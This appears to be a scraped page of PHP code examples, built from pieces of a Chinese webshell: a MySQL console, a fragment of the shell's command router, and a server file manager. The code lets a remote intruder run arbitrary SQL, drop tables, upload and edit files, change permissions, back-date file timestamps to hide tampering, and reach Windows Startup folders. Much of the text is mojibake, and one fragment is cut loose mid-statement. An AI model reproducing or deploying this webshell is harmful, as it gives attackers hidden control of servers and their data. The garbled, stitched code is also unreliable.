Exemple #1
0
function Mysql_Msg()
{
    $conn = @mysql_connect($_COOKIE['m_silichost'] . ':' . $_COOKIE['m_silicport'], $_COOKIE['m_silicuser'], $_COOKIE['m_silicpass']);
    if ($conn) {
        print <<<END
<script language="javascript">
function Delok(msg,gourl)
{
\tsmsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
\tif(confirm(smsg)){window.location = gourl;}
}
function Createok(ac)
{
\tif(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (spider BLOB);';
\tif(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
\tif(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
\treturn false;
}
</script>
END;
        $BOOL = false;
        $MSG_BOX = '�û�:' . $_COOKIE['m_silicuser'] . ' &nbsp;&nbsp;&nbsp;&nbsp; ��ַ:' . $_COOKIE['m_silichost'] . ':' . $_COOKIE['m_silicport'] . ' &nbsp;&nbsp;&nbsp;&nbsp; �汾:';
        $k = 0;
        $result = @mysql_query('select version();', $conn);
        while ($row = @mysql_fetch_array($result)) {
            $MSG_BOX .= $row[$k];
            $k++;
        }
        echo '<div class="actall"> ���ݿ�:';
        $result = mysql_query("SHOW DATABASES", $conn);
        while ($db = mysql_fetch_array($result)) {
            echo '&nbsp;&nbsp;[<a href="?s=r&db=' . $db['Database'] . '">' . $db['Database'] . '</a>]';
        }
        echo '</div>';
        if (isset($_GET['db'])) {
            mysql_select_db($_GET['db'], $conn);
            if (!empty($_POST['nsql'])) {
                $BOOL = true;
                $MSG_BOX = mysql_query($_POST['nsql'], $conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� ' . mysql_error();
            }
            if (is_array($_POST['insql'])) {
                $query = 'INSERT INTO ' . $_GET['table'] . ' (';
                foreach ($_POST['insql'] as $var => $key) {
                    $querya .= $var . ',';
                    $queryb .= '\'' . addslashes($key) . '\',';
                }
                $query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');';
                $MSG_BOX = mysql_query($query, $conn) ? '���ӳɹ�' : '����ʧ�� ' . mysql_error();
            }
            if (is_array($_POST['upsql'])) {
                $query = 'UPDATE ' . $_GET['table'] . ' SET ';
                foreach ($_POST['upsql'] as $var => $key) {
                    $queryb .= $var . '=\'' . addslashes($key) . '\',';
                }
                $query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';';
                $MSG_BOX = mysql_query($query, $conn) ? '�޸ijɹ�' : '�޸�ʧ�� ' . mysql_error();
            }
            if (isset($_GET['del'])) {
                $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn);
                $good = mysql_fetch_assoc($result);
                $query = 'DELETE FROM ' . $_GET['table'] . ' WHERE ';
                foreach ($good as $var => $key) {
                    $queryc .= $var . '=\'' . addslashes($key) . '\' AND ';
                }
                $where = $query . substr($queryc, 0, -4) . ';';
                $MSG_BOX = mysql_query($where, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error();
            }
            $action = '?s=r&db=' . $_GET['db'];
            if (isset($_GET['drop'])) {
                $query = 'Drop TABLE IF EXISTS ' . $_GET['drop'] . ';';
                $MSG_BOX = mysql_query($query, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error();
            }
            if (isset($_GET['table'])) {
                $action .= '&table=' . $_GET['table'];
                if (isset($_GET['edit'])) {
                    $action .= '&edit=' . $_GET['edit'];
                }
            }
            if (isset($_GET['insert'])) {
                $action .= '&insert=' . $_GET['insert'];
            }
            echo '<div class="actall"><form method="POST" action="' . $action . '">';
            echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">' . $_POST['nsql'] . '</textarea> ';
            echo '<input type="submit" name="querysql" value="ִ��" style="width:60px;height:49px;"> ';
            echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
            echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
            echo '<input type="button" value="ɾ����" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
            echo '<div class="msgbox" style="height:40px;">' . $MSG_BOX . '</div><div class="actall"><a href="?s=r&db=' . $_GET['db'] . '">' . $_GET['db'] . '</a> ---> ';
            if (isset($_GET['table'])) {
                echo '<a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '">' . $_GET['table'] . '</a> ';
                echo '[<a href="?s=r&db=' . $_GET['db'] . '&insert=' . $_GET['table'] . '">����</a>]</div>';
                if (isset($_GET['edit'])) {
                    if (isset($_GET['p'])) {
                        $atable = $_GET['table'] . '&p=' . $_GET['p'];
                    } else {
                        $atable = $_GET['table'];
                    }
                    echo '<form method="POST" action="?s=r&db=' . $_GET['db'] . '&table=' . $atable . '">';
                    $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn);
                    $good = mysql_fetch_assoc($result);
                    $u = 0;
                    foreach ($good as $var => $key) {
                        $queryc .= $var . '=\'' . $key . '\' AND ';
                        $type = @mysql_field_type($result, $u);
                        $len = @mysql_field_len($result, $u);
                        echo '<div class="actall">' . $var . ' <font color="#FF0000">' . $type . '(' . $len . ')</font><br><textarea name="upsql[' . $var . ']" style="width:600px;height:60px;">' . htmlspecialchars($key) . '</textarea></div>';
                        $u++;
                    }
                    $where = 'WHERE ' . substr($queryc, 0, -4);
                    echo '<input type="hidden" id="wherevar" name="wherevar" value="' . base64_encode($where) . '">';
                    echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
                } else {
                    $query = 'SHOW COLUMNS FROM ' . $_GET['table'];
                    $result = mysql_query($query, $conn);
                    $fields = array();
                    $row_num = mysql_num_rows(mysql_query('SELECT * FROM ' . $_GET['table'], $conn));
                    if (!isset($_GET['p'])) {
                        $p = 0;
                        $_GET['p'] = 1;
                    } else {
                        $p = ((int) $_GET['p'] - 1) * 20;
                    }
                    echo '<table border="0"><tr>';
                    echo '<td class="toptd" style="width:70px;" nowrap>����</td>';
                    while ($row = @mysql_fetch_assoc($result)) {
                        array_push($fields, $row['Field']);
                        echo '<td class="toptd" nowrap>' . $row['Field'] . '</td>';
                    }
                    echo '</tr>';
                    if (eregi('WHERE|LIMIT', $_POST['nsql']) && eregi('SELECT|FROM', $_POST['nsql'])) {
                        $query = $_POST['nsql'];
                    } else {
                        $query = 'SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $p . ', 20;';
                    }
                    $result = mysql_query($query, $conn);
                    $v = $p;
                    while ($text = @mysql_fetch_assoc($result)) {
                        echo '<tr><td><a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&edit=' . $v . '"> �޸� </a> ';
                        echo '<a href="#" onclick="Delok(\'��\',\'?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&del=' . $v . '\');return false;"> ɾ�� </a></td>';
                        foreach ($fields as $row) {
                            echo '<td>' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . '</td>';
                        }
                        echo '</tr>' . "\r\n";
                        $v++;
                    }
                    echo '</table><div class="actall">';
                    for ($i = 1; $i <= ceil($row_num / 20); $i++) {
                        $k = (int) $_GET['p'] == $i ? '<font color="#FF0000">' . $i . '</font>' : $i;
                        echo '<a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $i . '">[' . $k . ']</a> ';
                    }
                    echo '</div>';
                }
            } elseif (isset($_GET['insert'])) {
                echo '<a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['insert'] . '">' . $_GET['insert'] . '</a></div>';
                $result = mysql_query('SELECT * FROM ' . $_GET['insert'], $conn);
                $fieldnum = @mysql_num_fields($result);
                echo '<form method="POST" action="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['insert'] . '">';
                for ($i = 0; $i < $fieldnum; $i++) {
                    $name = @mysql_field_name($result, $i);
                    $type = @mysql_field_type($result, $i);
                    $len = @mysql_field_len($result, $i);
                    echo '<div class="actall">' . $name . ' <font color="#FF0000">' . $type . '(' . $len . ')</font><br><textarea name="insql[' . $name . ']" style="width:600px;height:60px;"></textarea></div>';
                }
                echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
            } else {
                $query = 'SHOW TABLE STATUS';
                $status = @mysql_query($query, $conn);
                while ($statu = @mysql_fetch_array($status)) {
                    $statusize[] = $statu['Data_length'];
                    $statucoll[] = $statu['Collation'];
                }
                $query = 'SHOW TABLES FROM ' . $_GET['db'] . ';';
                echo '</div><table border="0"><tr>';
                echo '<td class="toptd" style="width:550px;"> ���� </td>';
                echo '<td class="toptd" style="width:80px;"> ���� </td>';
                echo '<td class="toptd" style="width:130px;"> �ַ��� </td>';
                echo '<td class="toptd" style="width:70px;"> ��С </td></tr>';
                $result = @mysql_query($query, $conn);
                $k = 0;
                while ($table = mysql_fetch_row($result)) {
                    echo '<tr><td><a href="?s=r&db=' . $_GET['db'] . '&table=' . $table[0] . '">' . $table[0] . '</a></td>';
                    echo '<td><a href="?s=r&db=' . $_GET['db'] . '&insert=' . $table[0] . '"> ���� </a> <a href="#" onclick="Delok(\'' . $table[0] . '\',\'?s=r&db=' . $_GET['db'] . '&drop=' . $table[0] . '\');return false;"> ɾ�� </a></td>';
                    echo '<td>' . $statucoll[$k] . '</td><td align="right">' . File_Size($statusize[$k]) . '</td></tr>' . "\r\n";
                    $k++;
                }
                echo '</table>';
            }
        }
    } else {
        die('����MYSQLʧ��,�����µ�½.<meta http-equiv="refresh" content="0;URL=?s=o">');
    }
    if (!$BOOL) {
        echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \'' . addslashes($query) . '\';</script>';
    }
    return false;
}
                     $statusize[] = $statu['Data_length'];
                     $statucoll[] = $statu['Collation'];
                 }
                 $query = 'SHOW TABLES FROM ' . $_GET['db'] . ';';
                 echo '</div><table border="0"><tr>';
                 echo '<td class="toptd" style="width:550px;"> 表名 </td>';
                 echo '<td class="toptd" style="width:80px;"> 操作 </td>';
                 echo '<td class="toptd" style="width:130px;"> 字符集 </td>';
                 echo '<td class="toptd" style="width:70px;"> 大小 </td></tr>';
                 $result = @mysql_query($query, $conn);
                 $k = 0;
                 while ($table = mysql_fetch_row($result)) {
                     $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_'));
                     echo '<tr><td><a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $table[0] . '">' . $table[0] . '</a></td>';
                     echo '<td><a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&insert=' . $table[0] . '"> 插入 </a> <a href="#" onclick="Delok(\'' . $table[0] . '\',\'?eanver=mysql_msg&db=' . $_GET['db'] . '&drop=' . $table[0] . '\');return false;"> 删除 </a></td>';
                     echo '<td>' . $statucoll[$k] . '</td><td align="right">' . File_Size($statusize[$k]) . '</td></tr>' . "\r\n";
                     $k++;
                 }
                 echo '</table>';
             }
         }
     } else {
         die('连接MYSQL失败,请重新登陆.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
     }
     if (!$BOOL and addslashes($query) != '') {
         echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \'' . addslashes($query) . '\';</script>';
     }
     break;
 default:
     html_main($path, $shellname);
     break;
Exemple #3
0
function File_a($p)
{
    $MSG_BOX = 'waiting for message queue......';
    if (!$_SERVER['SERVER_NAME']) {
        $GETURL = '';
    } else {
        $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/';
    }
    $UP_DIR = urlencode(File_Str($p . '/..'));
    $REAL_DIR = File_Str(realpath($p));
    $FILE_DIR = File_Str(dirname(__FILE__));
    $ROOT_DIR = File_Mode();
    $THIS_DIR = urlencode(File_Str($p));
    $UP_DIR = urlencode(File_Str(dirname($p)));
    $NUM_D = 0;
    $NUM_F = 0;
    if (!empty($_POST['pfn'])) {
        $intime = @strtotime($_POST['mtime']);
        $MSG_BOX = File_Write($_POST['pfn'], $_POST['pfc'], 'wb') ? 'edit file ' . $_POST['pfn'] . ' success' : 'edit file ' . $_POST['pfn'] . ' faild';
        @touch($_POST['pfn'], $intime);
    }
    if (!empty($_POST['ufs'])) {
        if ($_POST['ufn'] != '') {
            $upfilename = $_POST['ufn'];
        } else {
            $upfilename = $_FILES['ufp']['name'];
        }
        $MSG_BOX = File_Up($_FILES['ufp']['tmp_name'], File_Str($p . '/' . $upfilename)) ? 'upfile ' . $upfilename . ' success' : 'upfile ' . $upfilename . ' 失败';
    }
    if (!empty($_POST['actall'])) {
        $MSG_BOX = File_Act($_POST['files'], $_POST['actall'], $_POST['inver']);
    }
    if (!empty($_GET['mn'])) {
        $MSG_BOX = @rename(File_Str($p . '/' . $_GET['mn']), File_Str($p . '/' . $_GET['rn'])) ? 'rename ' . $_GET['mn'] . ' to ' . $_GET['rn'] . ' success' : 'rename ' . $_GET['mn'] . ' to ' . $_GET['rn'] . ' faild';
    }
    if (!empty($_GET['dn'])) {
        $MSG_BOX = @mkdir(File_Str($p . '/' . $_GET['dn']), 0777) ? 'create folder ' . $_GET['dn'] . ' success' : 'create folder ' . $_GET['dn'] . ' faild';
    }
    if (!empty($_GET['dd'])) {
        $MSG_BOX = File_Deltree($_GET['dd']) ? 'del folder ' . $_GET['dd'] . ' success' : 'del folder ' . $_GET['dd'] . ' faild';
    }
    if (!empty($_GET['df'])) {
        if (!File_Down($_GET['df'])) {
            $MSG_BOX = 'the download file does not exists';
        }
    }
    Root_CSS();
    print <<<END
<script type="text/javascript">
\tfunction Inputok(msg,gourl)
\t{
\t\tsmsg = "current file:[" + msg + "]";
\t\tre = prompt(smsg,unescape(msg));
\t\tif(re)
\t\t{
\t\t\tvar url = gourl + escape(re);
\t\t\twindow.location = url;
\t\t}
\t}
\tfunction Delok(msg,gourl)
\t{
\t\tsmsg = "sure for del [" + unescape(msg) + "] ?";
\t\tif(confirm(smsg))
\t\t{
\t\t\tif(gourl == 'b'){document.getElementById('actall').value = escape(gourl);document.getElementById('fileall').submit();}
\t\t\telse window.location = gourl;
\t\t}
\t}
\tfunction CheckDate(msg,gourl)
\t{
\t\tsmsg = "current file time:[" + msg + "]";
\t\tre = prompt(smsg,msg);
\t\tif(re)
\t\t{
\t\t\tvar url = gourl + re;
\t\t\tvar reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})\$/; 
\t\t\tvar r = re.match(reg);
\t\t\tif(r==null){alert('time error!format:yyyy-mm-dd hh:mm:ss');return false;}
\t\t\telse{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
\t\t}
\t}
\tfunction CheckAll(form)
\t{
\t\tfor(var i=0;i<form.elements.length;i++)
\t\t{
\t\t\tvar e = form.elements[i];
\t\t\tif (e.name != 'chkall')
\t\t\te.checked = form.chkall.checked;
\t\t}
\t}
\tfunction SubmitUrl(msg,txt,actid)
\t{
\t\tre = prompt(msg,unescape(txt));
\t\tif(re)
\t\t{
\t\t\tdocument.getElementById('actall').value = actid;
\t\t\tdocument.getElementById('inver').value = escape(re);
\t\t\tdocument.getElementById('fileall').submit();
\t\t}
\t}
</script>
\t<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
\t<div class="actall" style="text-align:center;padding:3px;">
\t<form method="GET"><input type="hidden" name="s" value="a">
\t<input type="text" name="p" value="{$p}" style="width:50%;height:22px;">
\t<select onchange="location.href='?s=a&p='+options[selectedIndex].value">
\t<option>---some folder---</option>
\t<option value="{$ROOT_DIR}"> site root folder </option>
\t<option value="{$FILE_DIR}"> current folder </option>
\t<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动"> start item (cn) </option>
\t<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"> start item (en) </option>
\t<option value="C:/RECYCLER"> RECYCLER </option>
\t<option value="C:/Program Files"> Program Files </option>
\t</select> <input class="bt" type="submit" value="jump"></form>
\t<div style="margin-top:3px;"></div>
\t<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
\t<input class="bt" type="button" value="Create File" onclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
\t<input class="bt" type="button" value="Create Folder" onclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');"> 
\t<input type="file" name="ufp" style="width:30%;height:22px;">
\t<input type="text" name="ufn" style="width:20%;height:22px;">
\t<input class="bt" type="submit" name="ufs" value="upfile">
\t</form>
\t</div>
\t<form method="POST" id="fileall" action="?s=a&p={$THIS_DIR}">
\t<table border="0"><tr>
\t<td class="toptd" style="width:810px;"> <a href="?s=a&p={$UP_DIR}"><b>parent directory</b></a> </td>
\t<td class="toptd" style="width:100px;"> opertion </td>
\t<td class="toptd" style="width:60px;"> attr </td>
\t<td class="toptd" style="width:200px;"> time </td>
\t<td class="toptd" style="width:100px;"> size </td></tr>
END;
    if (($h_d = @opendir($p)) == NULL) {
        return false;
    }
    while (false !== ($Filename = @readdir($h_d))) {
        if ($Filename == '.' or $Filename == '..') {
            continue;
        }
        $Filepath = File_Str($p . '/' . $Filename);
        if (is_dir($Filepath)) {
            $Fileperm = substr(base_convert(@fileperms($Filepath), 10, 8), -4);
            $Filetime = @date('Y-m-d H:i:s', @filemtime($Filepath));
            $Filepath = urlencode($Filepath);
            echo "\n" . '<tr><td><a href="?s=a&p=' . $Filepath . '"><font face="wingdings" size="3">0</font><b>' . $Filename . '</b></a></td>';
            $Filename = urlencode($Filename);
            echo '<td><a href="#" onclick="Delok(\'' . $Filename . '\',\'?s=a&p=' . $THIS_DIR . '&dd=' . $Filename . '\');return false;">Del</a> ';
            echo '<a href="#" onclick="Inputok(\'' . $Filename . '\',\'?s=a&p=' . $THIS_DIR . '&mn=' . $Filename . '&rn=\');return false;">Rename</a></td>';
            echo '<td><a href="#" onclick="Inputok(\'' . $Fileperm . '\',\'?s=a&p=' . $THIS_DIR . '&mk=' . $Filename . '&md=\');return false;">' . $Fileperm . '</a></td>';
            echo '<td>' . $Filetime . '</td> ';
            echo '<td> </td></tr>' . "\n";
            $NUM_D++;
        }
    }
    @rewinddir($h_d);
    while (false !== ($Filename = @readdir($h_d))) {
        if ($Filename == '.' or $Filename == '..') {
            continue;
        }
        $Filepath = File_Str($REAL_DIR . '/' . $Filename);
        if (!is_dir($Filepath)) {
            $Fileurls = str_replace(File_Str($ROOT_DIR . '/'), $GETURL, $Filepath);
            $Fileperm = substr(base_convert(@fileperms($Filepath), 10, 8), -4);
            $Filetime = @date('Y-m-d H:i:s', @filemtime($Filepath));
            $Filesize = File_Size(@filesize($Filepath));
            if ($Filepath == File_Str(__FILE__)) {
                $fname = '<font color="#FF0000">' . $Filename . '</font>';
            } else {
                $fname = $Filename;
            }
            echo "\r\n" . ' <tr><td> <input type="checkbox" name="files[]" value="' . urlencode($Filepath) . '"><a target="_blank" href="' . $Fileurls . '">' . $fname . '</a> </td>';
            $Filepath = urlencode($Filepath);
            $Filename = urlencode($Filename);
            echo ' <td> <a href="?s=p&fp=' . $THIS_DIR . '&fn=' . $Filename . '"> Edit </a> ';
            echo ' <a href="#" onclick="Inputok(\'' . $Filename . '\',\'?s=a&p=' . $THIS_DIR . '&mn=' . $Filename . '&rn=\');return false;"> Rename </a> </td>';
            echo ' <td>' . $Fileperm . '</td> ';
            echo ' <td>' . $Filetime . '</td> ';
            echo ' <td align="right"> <a href="?s=a&df=' . $Filepath . '">' . $Filesize . '</a> </td></tr> ' . "\r\n";
            $NUM_F++;
        }
    }
    @closedir($h_d);
    print <<<END
</table>
<div class="actall"><input type="hidden" name="actall" value="undefined">
<input type="hidden" name="inver" value="undefined">
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
<input class="bt" type="button" value="Copy" onclick="SubmitUrl('copy selected files to folder: ','{$THIS_DIR}','a');return false;"> 
<input class="bt" type="button" value="Del" onclick="Delok('selected files','b');return false;"> 
<input class="bt" type="button" value="Attr" onclick="SubmitUrl('change selected files attr value: ','0666','c');return false;"> 
<input class="bt" type="button" value="Time" onclick="CheckDate('2010-04-21 17:31:20','d');return false;"> 
folders({$NUM_D}) / files({$NUM_F})</div>
</form>
END;
    return true;
}